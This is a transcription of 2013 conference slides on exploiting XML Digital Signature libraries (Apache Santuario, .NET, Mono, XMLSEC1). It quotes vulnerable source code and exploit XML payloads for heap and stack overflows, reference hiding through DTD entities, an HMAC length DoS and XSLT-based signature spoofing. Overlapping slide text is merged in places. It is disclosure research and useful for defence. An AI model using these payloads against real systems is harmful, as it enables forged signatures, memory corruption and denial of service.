The Forger s Art Exploiting XML Digital Signature Implementations HITB 2013

Transcription

1 The Forger s Art Exploiting XML Digital Signature Implementations HITB 2013 James Forshaw (@tiraniddo) Research. Response.

2 What am I going to talk about? XML Digital Signature Implementations Vulnerabilities and how to exploit Memory Corruption Denial of Service Parsing Issues Signature Spoofing Demos

3 Why? SOAP Web Service Security Visa 3D Secure / Verified by Visa SAML Assertions MS Office Signatures.NET ClickOnce/XBAP Manifests

4 Once upon a time, on a client site...

5 Implementations

6 Existing Attacks Been numerous attacks against XML Digital Signatures HMAC Truncation (CVE ) Signature Wrapping XSLT DoS/Remote Code Execution

7 What are XML Digital Signatures?

8 XML Digital Signatures

9 Signing XML <good/> Read Bytes Sign XML Document Signature

10 Signing XML S/MIME? PGP? <good/> XML Document Signature

11 Of Course Not As the "great" Steve Ballmer might have said: "XML Developers, XML Developers, XML Developers!"

12 Signing XML <good/> Reference <good/> Transform XML Document Canonicalize <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI="#id"> <Transforms/> <DigestMethod/> <DigestValue>Bo0b5... </DigestValue> </Reference> </SignedInfo> SignedInfo Digest SHA1: 09381a0 9812f20... Digest <good/> SHA1: 5282abc 5efefa0... Sign Build Result Identity Signed XML Document

13 Signed XML Document <good> <Signature xmlns=" <SignedInfo> <CanonicalizationMethod Algorithm=" <SignatureMethod Algorithm=" <Reference URI=""> <Transforms> <Transform Algorithm=" </Transforms> <DigestMethod Algorithm=" <DigestValue>Bo0b5...</DigestValue> </Reference> </SignedInfo> <SignatureValue>K4TYp...</SignatureValue> </Signature> </good>

18 Verification Pipeline <good/> <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI="#id"> <Transforms/> <DigestMethod/> <DigestValue>Bo0b5... </DigestValue> </Reference> </SignedInfo> Signature Parsing SignedInfo Verification Reference Verification?

19 Signature Parsing Bugs

20 CVE Affected Apache Santuario C++ Unauthenticated Heap overflow in Exclusive Canonicalization prefix list

21 Canonicalization Prefix List <Transform Algorithm=" <InclusiveNamespaces PrefixList="xsd ds" xmlns=" </Transform>

22 Canonicalization Prefix List <Transform Algorithm=" <InclusiveNamespaces PrefixList="xsd ds" xmlns=" </Transform>

23 CVE bool iswhitespace(char c) { return c == ' ' c == '\0' c == '\t' c == '\r' c == '\n'; void XSECC14n ::setExclusive(char * xmlnslist) { char* nsbuf = new char [strlen(xmlnslist) + 1]; int i = 0, j = 0; while (xmlnslist[i]!= '\0') { while (iswhitespace(xmlnslist[i])) ++i; // Skip white space j = 0; while (!iswhitespace(xmlnslist[i])) nsbuf[j++] = xmlnslist[i++]; // Copy name // Terminate the string nsbuf[j] = '\0'; // Add to exclusive list m_exclnslist.push_back(strdup(nsbuf));

30 Exploiting It <Reference URI=""> <Transforms> <Transform Algorithm=" <InclusiveNamespaces PrefixList="AAAA..."/> </Transform> <Transform Algorithm=" <InclusiveNamespaces PrefixList=""/> </Transform> </Transforms> </Reference>

33 First Transform xmlnslist 'A' 'A' 'A' 'A' 'A' 'A' 'A' 'A' nsbuf 'A' 'A' 'A' 'A' 'A' 'A' 'A' 'A'

34 Second Transform iswhitespace() == true i xmlnslist ' ' 0 'A' 'A' 'A' 'A' 'A' 'A' j nsbuf X X

35 Second Transform iswhitespace() == true i xmlnslist ' ' 0 'A' 'A' 'A' 'A' 'A' 'A' j nsbuf X X

36 Second Transform iswhitespace() == false i xmlnslist ' ' 0 'A' 'A' 'A' 'A' 'A' 'A' j nsbuf 'A' X

37 Second Transform iswhitespace() == false i xmlnslist ' ' 0 'A' 'A' 'A' 'A' 'A' 'A' j nsbuf 'A' 'A' X 'A' 'A' 'A' 'A' 'A' 'A'

38 CVE Affected Apache Santuario C++ Unauthenticated Stack overflow parsing a Reference URI Bonus: Fix was wrong, ended up with a heap overflow instead

39 Reference URIs <good id="xyz"> </good> Reference Type ID Reference Entire Document XPointer ID XPointer Entire Document External Example <Reference URI="#xyz"> <Reference URI=""> <Reference URI="#xpointer(id('xyz'))"> <Reference URI="#xpointer(/)"> <Reference URI="

40 CVE const char* URI = getreferenceuri(); // Check for #xpointer(id('a')) if (strncmp(uri, "#xpointer(id('", 14) == 0) { size_t len = strlen(&uri[14]); char tmp[512]; if (len > 511) len = 511; size_t j = 14, i = 0; // Extract ID value while (URI[j]!= '\'') { tmp[i++] = URI[j++]; tmp[i] = '\0';

44 Exploiting It <root> <Signature xmlns=" <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI="#xpointer(id('AAAA...')"> <Transforms/> <DigestMethod/> <DigestValue>Bo0b5...</DigestValue> </Reference> </SignedInfo> <SignatureValue>K4TYp...</SignatureValue> </Signature> </root>

45 Demo Time!

46 Reference Verification Bugs

47 XML Equivalence Different physical XML representations might still be equivalent <good x="1" y="2"/> <good y="2" x="1"></good>

48 Naïve Verification <good x="1" y="2"/> <good y="2" x="1"></good> SHA1 SHA1 1cc730a1b a6d5ff15...

49 Canonicalization (C14N) <good x="1" y="2"/> <good y="2" x="1"></good> Canonicalizer <good x="1" y="2"></good> SHA1 9c251a

50 Canonicalization (C14N) XML Document 1 XML Document 2 Canonicalizer Canonical XML SHA1 XXXXXXXXXXXXXX...

51 Mono C14N Vulnerability Affected Mono (unfixed) Also affected XMLSEC1 (fixed) Allows limited signed content modification Same author for both implementations

52 W3C Canonical XML

53 The Bug <good x='"'/> <good x="""></good> <good xmlns='"'/> <good xmlns="""></good> LibXML2 Requires Valid URLs for Namespaces, though Mono doesn't Still, xmlns=' works on XMLSEC1

54 Exploiting It <Transaction> <x:expiry xmlns:x=' time='10:00:00'/> <Payee>Bob</Payee> <Amount>$100</Amount> </Transaction> bool IsExpired(XmlNode trans) { XmlNode expiry = trans.getelementbyname(" "Expiry"); if(expiry!= null) { return CheckExpiry(expiry); return false;

55 Exploiting It <Transaction> <x:expiry xmlns:x=' time="10:00:00'/> <Payee>Bob</Payee> <Amount>$100</Amount> </Transaction> <Transaction> <x:expiry xmlns:x=" time="10:00:00"/> <Payee>Bob</Payee> <Amount>$100</Amount> </Transaction> NS Before = ' time="10:00:00' NS After = '

56 CVE Affected Apache Santuario C++ Signature Bypass by Hiding References Uses an Interesting parsing exploit Almost works in Mono, but they got Lucky!

57 CVE bool DSIGSignature::verify(void) { // First thing to do is check the references bool referencecheckresult = mp_signedinfo->verify(); // Check the signature bool sigvfyresult = verifysignatureonlyinternal(); return sigvfyresult & referencecheckresult;

58 CVE bool DSIGSignature::verify(void) { // First thing to do is check the references // bool referencecheckresult = mp_signedinfo->verify(); // Verify each reference element // // Check the signature bool sigvfyresult = verifysignatureonlyinternal(); bool DSIGSignedInfo::verify() { return return sigvfyresult DSIGReference::verifyReferenceList(mp_referenceList); & referencecheckresult;

59 CVE bool DSIGSignature::verify(void) { // First thing to do is check the references // bool referencecheckresult = mp_signedinfo->verify(); bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // // RunVerify through each a list reference of hashes element and checkhash for each one // // Check the signature bool res = true; bool sigvfyresult = verifysignatureonlyinternal(); int size = lst->getsize(); bool DSIGSignedInfo::verify() for (int i = 0; i < size; { ++i) { return return sigvfyresult DSIGReference::verifyReferenceList(mp_referenceList); & referencecheckresult; (lst->item(i)->checkhash()) { res = false; return res;

62 CVE bool DSIGSignature::verify(void) { // First thing to do is check the references // bool referencecheckresult = mp_signedinfo->verify(); bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // // RunVerify through each a list reference of hashes element and checkhash for each one // // Check the signature bool res = true; bool sigvfyresult = verifysignatureonlyinternal(); int size = lst->getsize(); bool DSIGSignedInfo::verify() for (int i = 0; i < size; { ++i) { return return sigvfyresult DSIGReference::verifyReferenceList(mp_referenceList); & referencecheckresult; (lst->item(i)->checkhash()) { res = false; return true;

63 CVE void DSIGSignedInfo::load(void) { DOMNode * child = mp_signedinfonode->getfirstchild(); // Load rest of SignedInfo... // Now look at references... child = child->getnextsibling(); // Run through the rest of the elements until done while (child!= 0 && (child->getnodetype()!= DOMNode::ELEMENT_NODE)) // Skip text and comments child = child->getnextsibling(); if (child!= NULL) // Have an element node - should be a reference, so let's load the list mp_referencelist = DSIGReference::loadReferenceListFromXML(mp_env, child);

67 Parsed DOM Tree ELEMENT_NODE <SignedInfo> ELEMENT_NODE <C14NMethod> ELEMENT_NODE <SignatureMethod> DSIGSignedInfo::load() ELEMENT_NODE <Reference> ELEMENT_NODE <Transforms> ELEMENT_NODE <Digest>

68 Parsed DOM Tree ELEMENT_NODE <SignedInfo> ELEMENT_NODE <C14NMethod> ELEMENT_NODE <SignatureMethod> Not an ELEMENT_NODE ELEMENT_NODE <Reference> DSIGSignedInfo::load() Ignored

69 Parsed DOM Tree ELEMENT_NODE <SignedInfo> ELEMENT_NODE <C14NMethod> ELEMENT_NODE <SignatureMethod> Not an ELEMENT_NODE ELEMENT_NODE <Reference> DSIGSignedInfo::load() Ignored

70 DOM Node Types Ref: Node Type Attribute CDATASection Comment Document Element Entity EntityReference ProcessingInstruction Child Types Text, EntityReference None None Element, ProcessInstruction, Comment, DocumentType Element, Text, Comment, ProcessingInstruction, CDATASection, EntityReference Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference None

73 Entity References ELEMENT_NODE <good> <!DOCTYPE good [ <!ENTITY ent "<b/>"> ]> <good> <a/>&ent;<c/> </good> ELEMENT_NODE <a> ENTITY_REF_NODE &ent; ELEMENT_NODE <c> ELEMENT_NODE <b>

74 Canonical Entity References Ref:

75 Canonical Entity References Ref:

76 Entity References after C14N <good> <a/><b/><c/> </good> ELEMENT_NODE <good> ELEMENT_NODE <a> ELEMENT_NODE <b> ELEMENT_NODE <c>

77 Exploiting It <good> <Signature xmlns=" <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI=""> <Transforms/> <DigestMethod/> <DigestValue>Bo0b5...</DigestValue> </Reference> </SignedInfo> <SignatureValue>K4TYp...</SignatureValue> </Signature> </good>

78 Exploiting It <!DOCTYPE good [ <!ENTITY hacked "<Reference URI="">...</Reference>"> ]> <good> <Signature xmlns=" <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI=""> <Transforms/> <DigestMethod/> <DigestValue>Bo0B5...</DigestValue> </Reference> </SignedInfo> <SignatureValue>K4TYp...</SignatureValue> </Signature> </good>

79 Exploiting It <!DOCTYPE good [ <!ENTITY hacked "<Reference URI="">...</Reference>"> ]> <good> <Signature xmlns=" <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> &hacked; </SignedInfo> <SignatureValue>K4TYp...</SignatureValue> </Signature> </good>

80 Parsed DOM Tree ELEMENT_NODE <SignedInfo> ELEMENT_NODE <C14NMethod> ELEMENT_NODE <SignatureMethod> ENTITY_REF_NODE &hacked; DSIGSignedInfo::load() Ignored ELEMENT_NODE <Reference>

81 CVE-2013-XXXX Affected: Everyone! DTD processing during transformation Can lead to trivial XML DoS attacks Also file stealing through OOB XXE

82 Transforms All Transforms XSLT Envelope Base64 C14N Inclusive Exclusive XPath

83 Transform Chain <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI=""> <Transforms> <Transform Algorithm=" /> <Transform Algorithm=" /> </Transforms> <DigestMethod Algorithm=" /> <DigestValue>l8bqyMiBpK9m4zbmKnl2b2lZxfI=</DigestValue> </Reference> </SignedInfo>

84 Transform Input/Output Transform Input Type Output Type C14N XML Node Set Octet Stream Base64 Octet Stream Octet Stream Envelope XML Node Set XML Node Set XPath XML Node Set XML Node Set XSLT Octet Stream Octet Stream Transformation Chain XML Node Node Node Input Base64 XML Node Node Node C14N Output How can we do this?

85 Reparsing XML XSECTXFMInputSource is(chain, false); // Create a XercesParser and parse! XercesDOMParser parser; parser.setdonamespaces(true); parser.setcreateentityreferencenodes(true); parser.setdoschema(true); parser.parse(is); xsecsize_t errorcount = parser.geterrorcount(); if (errorcount > 0) throw XSECException(XSECException::XSLError); mp_parseddoc = parser.adoptdocument();

86 Reparsing XML XSECTXFMInputSource is(chain, false); // Create a XercesParser and parse! XercesDOMParser parser; parser.setdonamespaces(true); parser.setcreateentityreferencenodes(true); parser.setdoschema(true); parser.parse(is); xsecsize_t errorcount = parser.geterrorcount(); if (errorcount > 0) throw XSECException(XSECException::XSLError); mp_parseddoc = parser.adoptdocument(); DTD Parsing not Disabled!

87 Demo Time!

88 SignedInfo Verification

89 CVE Affected Apache C++ (again) Circumvented "fix" for HMAC Truncation (CVE ) By sheer ineptitude it ended up an DoS rather than a Signature Bypass

90 Background CVE

91 HMAC Truncation <SignedInfo> <CanonicalizationMethod Algorithm=" <SignatureMethod Algorithm=" <HMACOutputLength>80</HMACOutputLength> </SignatureMethod>... </SignedInfo> AABBCCDDEEFF Truncate to 80 bits

92 HMAC Truncation <SignedInfo> <CanonicalizationMethod Algorithm=" <SignatureMethod Algorithm=" <HMACOutputLength>0</HMACOutputLength> </SignatureMethod>... </SignedInfo> AABBCCDDEEFF Truncate to 0 bits

93 CVE while (child && strcmp(getdsiglocalname(child, "HMACOutputLength")!= 0) child = child->getnextsibling(); if (child) { // Have a max output value! DOMNode *textnode = child->getfirstchild(); if (textnode) { m_hmacoutputlength = atoi(textnode->getnodevalue());

96 CVE while (child && strcmp(getdsiglocalname(child, "HMACOutputLength")!= 0) child = child->getnextsibling(); if (child) { // Have a max output value! DOMNode *textnode = child->getfirstchild(); if (textnode) { m_hmacoutputlength = atoi(textnode->getnodevalue()); So m_hmacoutputlength is an int?

97 CVE while (child && strcmp(getdsiglocalname(child, "HMACOutputLength")!= 0) child = child->getnextsibling(); if (child) { // First find the appropriate handler for the URI // Have a max output value! XSECAlgorithmHandler* handler = DOMNode *textnode = tmpsov->getfirstchild(); mapuritohandler(mp_signedinfo->getalgorithmuri()); if (textnode) { m_hmacoutputlength = atoi(textnode->getnodevalue()); bool sigvfyret = handler->verifybase64signature( m_signaturevaluesb.rawcharbuffer(), mp_signedinfo->gethmacoutputlength(), mp_signingkey);

98 CVE while (child && strcmp(getdsiglocalname(child, "HMACOutputLength")!= 0) child = child->getnextsibling(); if (child) { // First find the appropriate handler for the URI // Have a max output value! XSECAlgorithmHandler* handler = DOMNode *textnode = tmpsov->getfirstchild(); mapuritohandler(mp_signedinfo->getalgorithmuri()); if (textnode) { m_hmacoutputlength = atoi(textnode->getnodevalue()); bool sigvfyret = handler->verifybase64signature( m_signaturevaluesb.rawcharbuffer(), mp_signedinfo->gethmacoutputlength(), mp_signingkey);

99 CVE bool verifybase64signature( const char * sig, unsigned int outputlen, const char * hash, unsigned int hashlen, XSECCryptoKeyType type) { if(type == XSECCryptoKey::KEY_HMAC) : // FIX: CVE if (outputlen > 0 && (outputlen < 80 outputlen < hashlen / 2)) { throw XSECException("HMACOutputLength set to unsafe value."); return comparebase64stringtoraw(sig, hash, hashlen, outputlen);

102 CVE bool comparebase64stringtoraw( const char * b64str, unsigned char * raw, unsigned int rawlen, unsigned int maxcompare) { unsigned int maxbytes, maxbits; div_t d = {0; if(maxcompare == 0) { maxcompare = rawlen; d = div(maxcompare, 8); maxbytes = d.quot; maxbits = d.rem; return comparebits(decode(b64str), raw, maxbytes, maxbits);

103 CVE bool comparebase64stringtoraw( const char * b64str, unsigned char * raw, unsigned int rawlen, unsigned int maxcompare) { unsigned int maxbytes, maxbits; div_t d = {0; if(maxcompare == 0) { maxcompare = rawlen; d = div(maxcompare, 8); maxbytes = d.quot; maxbits = d.rem; return comparebits(decode(b64str), raw, maxbytes, maxbits);

104 CVE bool comparebase64stringtoraw( const char * b64str, unsigned bool char comparebits(const * raw, unsigned char* b64str, unsigned const int rawlen, unsigned char* raw, unsigned unsigned int maxcompare) int maxbytes, { unsigned int maxbits) { unsigned int maxbytes, maxbits; div_t d = unsigned {0; int i, j; if(maxcompare == 0) { for (i = 0; i < maxbytes; ++ i) { maxcompare if (raw[i] = rawlen;!= outputstr[i]) return false; d = div(maxcompare, 8); maxbytes = char d.quot; mask = 0x01; maxbits = for d.rem; (j = 0 ; j < maxbits; ++i) { if ((raw[i] & mask)!= (outputstr[i] & mask)) return comparebits(decode(b64str), return false; raw, maxbytes, maxbits); mask = mask << 1; return true;

107 Div Function

108 Div Function HMACOutputLength = -1 maxcompare = 0xFFFFFFFF d.quot = 0, d.rem = -1 maxbytes = 0, maxbits = 0xFFFFFFFF

109 Exploiting <SignedInfo> <CanonicalizationMethod Algorithm=" <SignatureMethod Algorithm=" <HMACOutputLength>-1</HMACOutputLength> </SignatureMethod>... </SignedInfo> AABBCCDDEEFF Truncate to 8 bits 00

110 DoS Only bool comparebase64stringtoraw( const char * b64str, unsigned bool char comparebits(const * raw, unsigned char* b64str, unsigned const int rawlen, unsigned char* raw, unsigned unsigned int maxcompare) int maxbytes, { unsigned int maxbits) { unsigned int maxbytes, maxbits; div_t d = unsigned {0; int i, j; if(maxcompare == 0) { for (i = 0; i < maxbytes; ++ i) { maxcompare if (raw[i] = rawlen;!= outputstr[i]) return false; d = div(maxcompare, 8); maxbytes = char d.quot; mask = 0x01; maxbits = for d.rem; (j = 0 ; j < maxbits; ++i) { if ((raw[i] & mask)!= (outputstr[i] & mask)) return comparebits(decode(b64str), return false; raw, maxbytes, maxbits); mask = mask << 1; return true;

113 Non-Constant Time Compare bool comparebits(const unsigned char* b64str, const unsigned char* raw, unsigned int maxbytes, unsigned int maxbits) { unsigned int i, j; for (i = 0; i < maxbytes; ++ i) { if (raw[i]!= outputstr[i]) return false; char mask = 0x01; for (j = 0 ; j < maxbits; ++i) { if ((raw[i] & mask)!= (outputstr[i] & mask)) return false; mask = mask << 1; return true;

114 Non-Constant Time Compare bool comparebits(const unsigned char* b64str, const unsigned char* raw, // Mono unsigned int maxbytes, bool Compare (byte[] expected, byte[] actual) { unsigned int maxbits) { for (int i=0; i < l; i++) { if (expected[i]!= actual[i]) unsigned int i, j; return false; for (i = 0; i < maxbytes; ++ i) { if (raw[i]!= outputstr[i]) return true; return false; char mask = 0x01; for (j = 0 ; j < maxbits; ++i) { if ((raw[i] & mask)!= (outputstr[i] & mask)) return false; mask = mask << 1; return true;

115 Non-Constant Time Compare bool comparebits(const unsigned char* b64str, const unsigned char* raw, // Mono unsigned int maxbytes, bool Compare (byte[] expected, byte[] actual) { unsigned int maxbits) { for (int i=0; i < l; i++) { if (expected[i]!= actual[i]) //.NET unsigned int i, j; return false; bool CheckSignedInfo(KeyedHashAlgorithm for (i = 0; i < maxbytes; ++ i) { macalg) { for (int if i (raw[i]!= outputstr[i]) return = 0; i true; < this.m_signature.signaturevalue.length; i++) { return false; if (m_signature.signaturevalue[i]!= actualhashvalue[i]) { char return mask false; = 0x01; for (j = 0 ; j < maxbits; ++i) { if ((raw[i] & mask)!= (outputstr[i] & mask)) return true; return false; mask = mask << 1; return true;

116 Non-Constant Time Compare bool comparebits(const unsigned char* b64str, const unsigned char* raw, // Mono unsigned int maxbytes, bool Compare (byte[] expected, byte[] actual) { unsigned int maxbits) { for (int i=0; i < l; i++) { if (expected[i]!= actual[i]) //.NET unsigned int i, j; return false; bool CheckSignedInfo(KeyedHashAlgorithm for (i = 0; i < maxbytes; ++ i) { macalg) { for (int if i (raw[i]!= outputstr[i]) return = 0; i true; < this.m_signature.signaturevalue.length; i++) { return false; // XMLSEC1 if if((datasize (m_signature.signaturevalue[i] > 1) && (memcmp(ctx->dgst,!= actualhashvalue[i]) data, datasize - 1)!= 0)) { char { return mask = 0x01; for (j transform->status false; = 0 ; j < maxbits; = xmlsectransformstatusfail; ++i) { if ((raw[i] return(0); & mask)!= (outputstr[i] & mask)) return true; return false; mask = mask << 1; transform->status = xmlsectransformstatusok; return return(0); true;

117 Back to the original story...

118 CVE /CVE /CVE Signature Spoofing through Canonicalization Algorithm Identifier Affected.NET, Apache Java and JRE Doesn't work in Mono, due to an "Incompatible Implementation"

119 SignedInfo Element <SignedInfo> <CanonicalizationMethod Algorithm=" <SignatureMethod Algorithm=" <Reference URI=""> <Transforms> <Transform Algorithm=" </Transforms> <DigestMethod Algorithm=" <DigestValue>Bo0b5...</DigestValue> </Reference> </SignedInfo>

122 Algorithm Identifiers Name Type URI Required? SHA1 Digest Yes Base64 Encoding Yes HMAC/SHA1 Signature Yes DSA/SHA1 Signature Yes RSA/SHA1 Signature No C14N 1.0 C14N C14N 1.1 C14N Yes Envelope Transform XPath Transform No XSLT Transform No Yes Yes

123 Extensible? "This specification defines a set of algorithms, their URIs, and requirements for implementation. Requirements are specified over implementation, not over requirements for signature use. Furthermore, the mechanism is extensible; alternative algorithms may be used by signature applications."

124 Creating.NET Canonicalizer class SignedInfo { public string CanonicalizationMethod { get; public Transform CanonicalizationMethodObject { get { return (Transform)CryptoConfig.CreateFromName(this.CanonicalizationMethod);

125 Creating.NET Canonicalizer class SignedInfo { public string CanonicalizationMethod { get; public Transform CanonicalizationMethodObject { get { return (Transform)CryptoConfig.CreateFromName(this.CanonicalizationMethod);

126 CryptoConfig?

127 CryptoConfig?

128 Derived from Transform

134 Exploiting It <good/> Good Signed XML Document Extract <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI="#id"> <Transforms/> <DigestMethod/> <DigestValue>Bo0b5... </DigestValue> </Reference> </SignedInfo> Canonicalize To XSLT <bad/> Modify Document <xsl:stylesheet version="1.0"> <xsl:output method="text" /> <xsl:template match="/"> <xsl:text disable-output-escaping="yes"> <SignedInfo xmlns=" </xsl:template> </xsl:stylesheet> Bad Signed XML Document

135 Final XML <SignedInfo> <CanonicalizationMethod Algorithm=" <xsl:stylesheet version="1.0" xmlns:xsl=" <xsl:output method="text" /> <xsl:template match="/"> <xsl:text disable-output-escaping="yes"> <SignedInfo xmlns=" </xsl:text> </xsl:template> </xsl:stylesheet> </CanonicalizationMethod> <SignatureMethod Algorithm=" /> </SignedInfo>

136 Exploiting It <bad/> Bad Signed XML Document Extract <xsl:stylesheet>... </xsl:stylesheet> XSL <SignedInfo> <CanonicalizationMethod/> <SignatureMethod/> <Reference URI="#id"> <Transforms/> <DigestMethod/> <DigestValue>Bo0b5... </DigestValue> </Reference> </SignedInfo> C14N Verify Signature

137 Demo Time!

138 And the Rest Invalid Parsing of Signatures Blended Threat between parsers Other DoS stuff in.net and WCF Many Lucky "bugs" in Mono

139 Final Score Sheet Implementation Parsing Issues Memory Corruption Signature Spoofing Denial of Service File Stealing Apache C++ Yes Yes Yes Yes Yes, hilariously! Apache Java/JRE Yes No Yes Yes Sort of, limited use XMLSEC1 No No Yes, Kind of Yes if libxml2 isn't fixed.net No No Yes Yes Yes No Mono Lucky Escape No Yes, should have been worse Yes I gave up even trying

140 Conclusions Don't Blindly Trust Your Implementation Double Check All References are as expected Double Check All Algorithms are as expected Probably stay away from Apache C++ and Mono

141 Questions?